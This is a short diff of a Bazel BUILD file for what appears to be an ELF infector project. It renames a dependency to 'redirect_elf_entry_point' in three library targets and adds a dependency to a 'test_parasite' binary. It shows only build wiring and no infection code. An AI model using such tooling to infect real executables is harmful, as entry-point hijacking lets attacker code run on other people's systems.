--- a/infector/BUILD
+++ b/infector/BUILD
@@ -23,7 +23,7 @@ cc_nostdlib_library(
     deps = [
         "//common:mmap",
         "//common:patch_pattern",
-        "//common:patch_relinguish_control",
+        "//common:redirect_elf_entry_point",
         "//nostdlib:stdio",
         "//nostdlib:string",
     ],
@@ -37,7 +37,7 @@ cc_nostdlib_library(
         "//common:file_descriptor",
         "//common:mmap",
         "//common:patch_pattern",
-        "//common:patch_relinguish_control",
+        "//common:redirect_elf_entry_point",
         "//nostdlib:stdio",
         "//nostdlib:string",
     ],
@@ -51,7 +51,7 @@ cc_nostdlib_library(
         "//common:file_descriptor",
         "//common:mmap",
         "//common:patch_pattern",
-        "//common:patch_relinguish_control",
+        "//common:redirect_elf_entry_point",
         "//nostdlib:stdio",
         "//nostdlib:string",
     ],
@@ -86,6 +86,7 @@ cc_nostdlib_binary(
     name = "test_parasite",
     srcs = ["test_parasite.cc"],
     deps = [
+        "//common:expected",
         "//common:macros",
         "//nostdlib:stdlib",
         "//nostdlib:string",
